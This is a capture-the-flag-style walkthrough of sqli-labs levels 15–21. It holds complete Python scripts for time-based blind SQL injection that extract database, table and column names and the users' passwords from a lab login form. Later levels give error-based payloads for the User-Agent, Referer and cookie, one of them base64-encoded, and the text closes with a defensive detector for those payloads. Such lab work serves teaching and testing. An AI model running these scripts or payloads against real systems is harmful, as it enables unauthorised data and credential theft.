# target of the login form (POST request):
url = "http://192.168.0.128:9020/Less-15/"

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0
    for i in range(50):
        # key payload:
        payload = "1' or length(database())={} and sleep(0.1)#".format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()          # time before the request
        requests.post(url, data=param)    # the request itself
        # the guess is right when the response takes longer than 1 s: the 0.1 s sleep is
        # evaluated for every row the query scans, so the delays add up past the threshold
        if time.time() - start_time > 1:
            length = i
            break
    print("=============" + "当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length + 1):  # substr() positions are 1-based, so probe positions 1..length
        for j in range(1, 128):     # ASCII codes 1..127; range() excludes the upper bound, hence 128
            payload = "1' or ascii(substr(database(),{},1))={} and sleep(0.1)#".format(i, j)
            param = {"uname": payload, "passwd": ""}
            start_time = time.time()
            requests.post(url, data=param)
            if time.time() - start_time > 1:
                database_name = database_name + chr(j)
                print(database_name)
                break
    print("=============" + "当前数据库名为:" + database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        payload = "1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1)#".format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            payload = "1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1)#".format(i, j)
            param = {"uname": payload, "passwd": ""}
            start_time = time.time()
            requests.post(url, data=param)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i + 1) + str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # substr() positions are 1-based
            for k in range(1, 128):
                payload = "1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1)#".format(i, j, k)
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
            else:
                break  # no character matched at this position: the name is complete
        print("第{}张数据表名为:".format(i + 1) + table_name)
        table_name = ''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        payload = "1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1)#".format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                payload = "1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1)#".format(i, j, k)
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
            else:
                break  # end of this column name
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        payload = "1' or (select count(*) from users )={} and sleep(0.1)#".format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of every row in the users table:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                payload = "1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1)#".format(i, j, k)
                # id, username and password are joined with '---' in the extracted value
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
            else:
                break  # end of this record
        print("===第{}条记录的id值为:".format(i + 1) + values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # length of the current database name, then the name itself
    table_count = get_table_name_count()            # number of tables in the current database (queried once, reused below)
    get_table_name_length(table_count)              # length of each table name
    get_table_name(table_count)                     # every table name
    get_column_name(get_column_name_count())        # number of columns in users, then every column name
    get_username(get_users_count())                 # number of rows in users, then id/username/password of each row
Less-16:
Identify the injection point:
The closure is: ")
1") or 1=sleep(1)#
Brute-force with a Python script:
import requests
import time

# target of the login form (POST request):
url = "http://192.168.0.128:9020/Less-16/"

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0
    for i in range(50):
        # key payload:
        payload = '1") or length(database())={} and sleep(0.1)#'.format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()          # time before the request
        requests.post(url, data=param)    # the request itself
        # the guess is right when the response takes longer than 1 s: the 0.1 s sleep is
        # evaluated for every row the query scans, so the delays add up past the threshold
        if time.time() - start_time > 1:
            length = i
            break
    print("=============" + "当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length + 1):  # substr() positions are 1-based, so probe positions 1..length
        for j in range(1, 128):     # ASCII codes 1..127; range() excludes the upper bound, hence 128
            payload = '1") or ascii(substr(database(),{},1))={} and sleep(0.1)#'.format(i, j)
            param = {"uname": payload, "passwd": ""}
            start_time = time.time()
            requests.post(url, data=param)
            if time.time() - start_time > 1:
                database_name = database_name + chr(j)
                print(database_name)
                break
    print("=============" + "当前数据库名为:" + database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        payload = '1") or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1)#'.format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            payload = '1") or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1)#'.format(i, j)
            param = {"uname": payload, "passwd": ""}
            start_time = time.time()
            requests.post(url, data=param)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i + 1) + str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # substr() positions are 1-based
            for k in range(1, 128):
                payload = '1") or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1)#'.format(i, j, k)
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
            else:
                break  # no character matched at this position: the name is complete
        print("第{}张数据表名为:".format(i + 1) + table_name)
        table_name = ''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        payload = '1") or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1)#'.format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                payload = '1") or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1)#'.format(i, j, k)
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
            else:
                break  # end of this column name
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        payload = '1") or (select count(*) from users )={} and sleep(0.1)#'.format(i)
        param = {"uname": payload, "passwd": ""}
        start_time = time.time()
        requests.post(url, data=param)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of every row in the users table:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                payload = '1") or ascii(substr((select concat(id,"---",username,"---",password) from users limit {},1),{},1))={} and sleep(0.1)#'.format(i, j, k)
                # id, username and password are joined with '---' in the extracted value
                param = {"uname": payload, "passwd": ""}
                start_time = time.time()
                requests.post(url, data=param)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
            else:
                break  # end of this record
        print("===第{}条记录的id值为:".format(i + 1) + values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # length of the current database name, then the name itself
    table_count = get_table_name_count()            # number of tables in the current database (queried once, reused below)
    get_table_name_length(table_count)              # length of each table name
    get_table_name(table_count)                     # every table name
    get_column_name(get_column_name_count())        # number of columns in users, then every column name
    get_username(get_users_count())                 # number of rows in users, then id/username/password of each row
Less-17:
Identifying the injection point:
From the source code:
check_input() applies various escaping to username, so username cannot be used for injection here.
password can be injected.
Error-based injection with updatexml:

' or (select updatexml(1,concat(0x7e,(select database())),1)) #

Less-18:
Identifying the injection point:

In this level we can see directly from the source code that both uname and passwd are processed by check_input(), so injecting through uname or passwd is not possible. But in the code we also find the insert:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)VALUES ('$uagent','$IP', $uname)";

After entering the correct username and password, the page echoes the User-Agent,
so we use error-based injection.
Error-based injection:
Capture the request with Burp and modify it.

Modify it to:
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

Less-19:
Identifying the injection point:
Enter the correct username and password:
admin
admin

The page echoes the referring URL:
Your Referer is: http://192.168.0.128:9020/Less-19/
So the echo can be obtained by modifying the User-Agent.
Error-based injection:
Capture the request with Burp and modify the User-Agent:

Modify the information here:
Error-based injection with the extractvalue function:
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

Less-20:
Identifying the injection point:
Enter the correct username and password
admin
admin

The page echoes:

Error-based injection:
Capture the request with Burp and modify the cookie:

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

Less-21:
Identifying the injection point:
The injection point is the cookie, which we modify:
YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkgYW5kICcxJz0nMQ==
Error-based injection by modifying the cookie:
Enter the correct username and password:
admin
admin

We find that the cookie is base64-encoded,
so our payload must be base64-encoded as well:
admin'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
After base64 encoding it becomes:
YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkgYW5kICcxJz0nMQ==
Modify the captured request in Burp:

The error message leaks the information.
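As an added example, not part of this write-up or of sqli-labs: a small Python detector for the header- and cookie-borne error-based payloads used in Less-18 through Less-21. It base64-decodes cookie values the way the Less-21 cookie is encoded and flags the extractvalue/updatexml/sleep markers; the marker list, the function names and the sample request are my own assumptions, and the cookie value is the one shown above.

```python
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Hypothetical marker list (an assumption, not from sqli-labs): the functions and
# quote/boolean fragments that the Less-17..21 payloads in this write-up rely on.
INJECTION_MARKERS = re.compile(
    r"(extractvalue\s*\(|updatexml\s*\(|sleep\s*\(|information_schema|"
    r"concat\s*\(\s*0x7e|'\s*(and|or)\s)",
    re.IGNORECASE,
)

def maybe_base64_decode(value: str) -> str:
    """Return the decoded text when value is valid base64 (the Less-21 cookie
    case), otherwise return it unchanged. Missing '=' padding is tolerated."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return value

def find_injection_markers(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Inspect User-Agent, Referer and every cookie value (decoded when it is
    base64) and return (location, inspected_text) for each suspicious one."""
    hits: List[Tuple[str, str]] = []
    for name in ("User-Agent", "Referer"):
        value = headers.get(name, "")
        if INJECTION_MARKERS.search(value):
            hits.append((name, value))
    for part in headers.get("Cookie", "").split(";"):
        if "=" not in part:
            continue
        cname, cvalue = part.strip().split("=", 1)
        decoded = maybe_base64_decode(cvalue)
        if INJECTION_MARKERS.search(decoded):
            hits.append(("Cookie:" + cname, decoded))
    return hits

# Constructed sample request: benign UA and Referer plus the base64 cookie from Less-21.
SAMPLE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
    "Referer": "http://192.168.0.128:9020/Less-19/",
    "Cookie": "uname=YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkgYW5kICcxJz0nMQ==",
}

if __name__ == "__main__":
    for where, text in find_injection_markers(SAMPLE_HEADERS):
        print(f"[ALERT] {where}: {text}")
```

Run against a real request log, the same function can be applied per request, and the decoded text in each hit is what should be written to the alert so analysts see the payload rather than the base64 blob.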
Tmx沐雪